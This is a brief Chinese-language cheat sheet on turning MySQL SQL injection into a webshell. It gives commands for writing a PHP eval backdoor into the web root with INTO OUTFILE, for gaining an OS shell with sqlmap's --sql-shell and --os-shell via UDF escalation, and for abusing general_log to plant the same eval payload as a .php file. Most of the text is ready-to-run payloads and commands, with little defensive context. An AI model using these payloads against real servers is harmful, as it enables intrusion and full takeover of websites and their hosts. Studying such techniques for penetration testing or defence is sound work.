SQL注入Getshell的几种方式
SQL注入Getshell的几种方式
SQL注入不仅阔以导致数据泄露,也有阔能getshell哦
0x01 into outfile
$ show global variables like '%secure%';
$ select '<?php eval($_POST[yyj]);?>' into outfile "C/phpstudy/www/shell.php";
$ sqlmap -u xxx --sql-shell
$ select @@datadir; #查看文件路径(mysql/data的路径,根目录一般与mysql处于同一目录)
$ select @@secure_file_priv;
0x02 sqlmap –os-shell
1.原理 –os-shell就是使用udf提权获取webshell。也是通过into outfile向服务器写入两个文件,一个可以直接执行系统命令,另一个可以上传文件。需要知道网站根目录以及数据库dba权限。
$ sqlmap -u xxx --os-shell
0x03 写日志
尝试用日志写入木马getshell不需要secure_file_priv没有具体值,但是需要知道网站根目录。
$ show global variables like '%general%' #查看日志功能是否开启
$ set global general_log = 'ON' #未开启的话设置为on
$ set global general_log_file = 'C:/phpStudy1/WWW/yyj.php'
$ select '<?php @eval($_POST[yyj]); ?>'